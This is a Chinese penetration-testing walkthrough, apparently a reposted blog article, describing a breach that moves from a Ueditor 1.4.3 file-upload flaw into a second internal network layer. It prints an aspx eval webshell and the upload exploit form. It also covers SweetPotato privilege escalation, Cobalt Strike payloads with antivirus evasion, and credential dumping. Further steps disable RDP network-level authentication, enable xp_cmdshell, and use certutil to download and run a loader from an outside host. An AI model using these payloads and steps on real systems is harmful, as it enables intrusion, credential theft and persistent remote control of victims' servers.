文章总结: 这篇文章详细描述了如何利用Ueditor编辑器的文件上传漏洞结合CobaltStrike远程控制工具渗透四层内网的实战过程。作者首先通过信息搜集发现目标网站使用HDHCMS系统,利用Ueditor1.4.3版本的任意文件上传漏洞上传aspx木马,然后使用哥斯拉工具和SweetPotato模块提权至system权限。通过获取系统凭据并破解,作者成功远程登录第一层服务器,并进一步发现第二层网络中的数据库服务器。作者利用数据库配置文件中的连接信息,通过MSSQL的xp_cmdshell功能在数据库服务器上执行命令,上传免杀木马并成功提权。文章强调了网络安全需要持续学习和坚持的重要性。
综合评分: 91
文章分类: 渗透测试,内网渗透,漏洞分析,红队,WEB安全
【攻防实战】Ueditor编辑器文件上传联动CS远控打穿四层内网(上)
原创
平凡安全
平凡安全
2025年11月15日 20:00
北京
「真正能定义你的,从来不是别人的眼光,而是你自己的选择」
「前言」
网络安全技术学习,承认⾃⼰的弱点不是丑事,只有对原理了然于⼼,才能突破更多的限制。
拥有快速学习能力的安全研究员,是不能有短板的,有的只能是大量的标准板和几块长板。
知识⾯,决定看到的攻击⾯有多⼴;知识链,决定发动的杀伤链有多深。
「最终成果」
最终收获的成果如下
「网络拓扑图」
本次实战绘制出来的网络拓扑图如下:
「第一层:12server-web1」
「信息搜集」
访问目标网站url:
目录扫描
扫到后台地址:
发现有注册功能, 先注册一下尝试能不能登录
注册后成功登录
搜集到的信息如下
cms:HDHCMS
服务器名称:12SERVER-WEB1
操作系统:MicrosoftWindows NT 6.3.9600.0
中间件:IIIS8.5
脚本语言:aspx
物理路径:C:\Hws.com\HwsHostMaster\wwwroot\www.xxx.com\web\admin\Hdhadmin.aspx
数据库:MSSQL
上传目录:upfiles/
富文本编辑器:百度Ueditor1.4.3
「边界突破」
在后台发现的富文本编辑器:百度Ueditor1.4.3 ,这个版本爆出过任意文件上传漏洞 , 可以直接拿shell, 进行漏洞验证
访问网上公开的POC,发现报错
很多情况下网站的二次开发会更改默认路径,已经知道了是HDHCMS,去查找其公开的源码,通过源代码的审计 ,得到编辑器路径
之后进行漏洞利用 ,构造一个aspx的图片马
aspx一句话木马:
然后图片马上传到公网服务器上
本地构造一个上传的form表单
<form action="http://www.xxx.com/admin/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>
上传图片马,上传地址修改为:
http://x.x.x.x/2.jpg?.aspx
成功上传该文件
访问木马地址
蚁剑连接
whoami
查看权限发现是普通用户权限
ipconfig
进行信息收集,发现存在内网网段
查看进程:
tasklist
进行识别发现存在360全家桶和护卫神
「哥斯拉提权」
哥斯拉生成1.aspx的木马
生成的木马内容:
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
成功连接
命令行执行
whoami
是普通用户权限
进入SweetPotato模块,点击load,点击run,成功提权到system权限
「cs拿shell」
打开CS,这是个服务器与客户端多对多架构的工具,先开服务端
在Listeners面板中点击Add按钮,新建一个监听器,如图
生成Payload 这里使用Pakages生成一个Payload。在菜单栏中依次选择Attacks→Pakages→Payload Generator命令,如图
保持默认配置,选择已经创建的监听器,设置输出类型为c,注意勾选x64,然后点击Generate按钮, 如图
「加壳免杀」
使用 cobaltstrike分离免杀工具生成loader.exe文件
过360火绒静态查杀
通过蚁剑上传到
C:/Hws.com/HwsHostMaster/wwwroot/www.xxx.com/web/upfiles/image/xxx/
目录下
哥斯拉进行提权成功以system权限上线到cs
「获取凭据」
logonpasswords
获取凭据
查看凭据
破解凭据,得到管理员的账号密码:
「远程登陆」
查看防火墙(需要administrator权限)
shell netsh firewall show state
可以看到防火墙是关闭的
shell netstat -ano
可以看到没有开放3389端口
打开3389端口
shell netstat -ano
再次查看可以看到3389端口已开放
使用上面得到的管理员的账号密码进行登录
页面显示报错密码过期
通过搜寻资料,了解到密码过期并不是真的过期,可能是开启了仅允许运行使用网络级别身份验证的远程桌面的计算机连接
关闭仅允许运行使用网络级别身份验证的远程桌面的计算机连接
shell REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d "0" /f
成功登录
「第二层:12server-data1」
「信息搜集」
查看内网第二层网段存活的机器
arp -a
可以看到内网第二层网络还有一台xxx.xxx.59.129机器存活
「线索发现」
通过蚁剑和哥斯拉拿到的shell,查看数据库的配置文件
绝对路径
C:/Hws.com/HwsHostMaster/wwwroot/www.xxx.com/web/HdhApp.config
从源代码中发现是站库分离的,数据库服务器刚好是上面内网第二层网络的xxx.xxx.59.129机器
并且判断是1433端口MSSQL数据库的sa权限
<add key="HdhCmsConnStr" value="user id=sa;[email protected];initial catalog=DemoHdhCms;data source= xxx.xxx.59.129"/>
「开代理连数据库」
cs服务器的地址和端口
连接数据库
成功连接
「开启xp_cmdshell」
新建查询,启用xp_cmdshell
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;EXEC sp_configure 'show advanced options',1;
如下
尝试调用xp_cmdshell运行系统命令
EXEC master..xp_cmdshell 'ipconfig';
恢复/删除xp_cmdshell
exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
exec sp_dropextendedproc 'xplog70.dll'
关闭xp_cmdshell
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',0;
RECONFIGURE;
「上线cs」
查看一下有无杀软tasklist , 发现存在火绒
做一下火绒的免杀 , 尝试上线, 使用windows的certutil命令远程下载文件
EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://xxx.xxx.8.198/loader.exe C:\Windows\Temp\schost.exe';
EXEC master..xp_cmdshell 'C:\Windows\Temp\schost.exe';
漏洞利用:
成功上线cs
如果目标机器出网,可以把木马放到自己的公网服务器上,如果目标机器不出网,只需把木马放到12server-web1上,供其下载
「权限提升」
使用
MS16-075 Sweet Potato
进行提权
漏洞利用
成功提权
「获取凭据」
logonpasswords
获取凭据
查看凭据
破解凭据,得到管理员的账号密码
「远程登陆」
查看防火墙(需要administrator权限)
shell netsh firewall show state
可以看到防火墙是关闭的
shell netstat -ano
可以看到没有开放3389端口
打开3389端口
shell netstat -ano
再次查看可以看到3389端口已开放
挂上12server-web1的代理,使用上面得到的管理员的账号密码进行登录
成功登录
「网络安全感悟」
网络安全是一个长期的过程,因为网络安全没有终点,不管是网络安全企业,还是在网络安全行业各种不同方向的从业人员,不管你选择哪个方向,只有在这条路上坚持不懈,才能在这条路上走的更远,走的更好,不然你肯定走不远,迟早会转行或者被淘汰,把时间全浪费掉。
如果你觉得自己是真的热爱网络安全这个行业,坚持走下去就可以了,不用去管别人,现在就是一个大浪淘金的时代,淘下去的是沙子,留下来的才是金子,正所谓,千淘万漉虽辛苦,吹尽狂沙始到金,网络安全的路还很长,一生只做一件事,坚持做好一件事!
「攻防交流群」
「声明」
文笔生疏,措辞浅薄,敬请各位大佬不吝赐教,万分感谢。
免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。
转载声明:平凡安全 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。
CSDN:
https://rdyx0.blog.csdn.net/
公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect
博客:
https://rdyx0.github.io/
先知社区:
https://xz.aliyun.com/u/37846
SecIN:
https://www.sec-in.com/author/3097
FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:平凡安全 平凡安全《【攻防实战】Ueditor编辑器文件上传联动CS远控打穿四层内网(上)》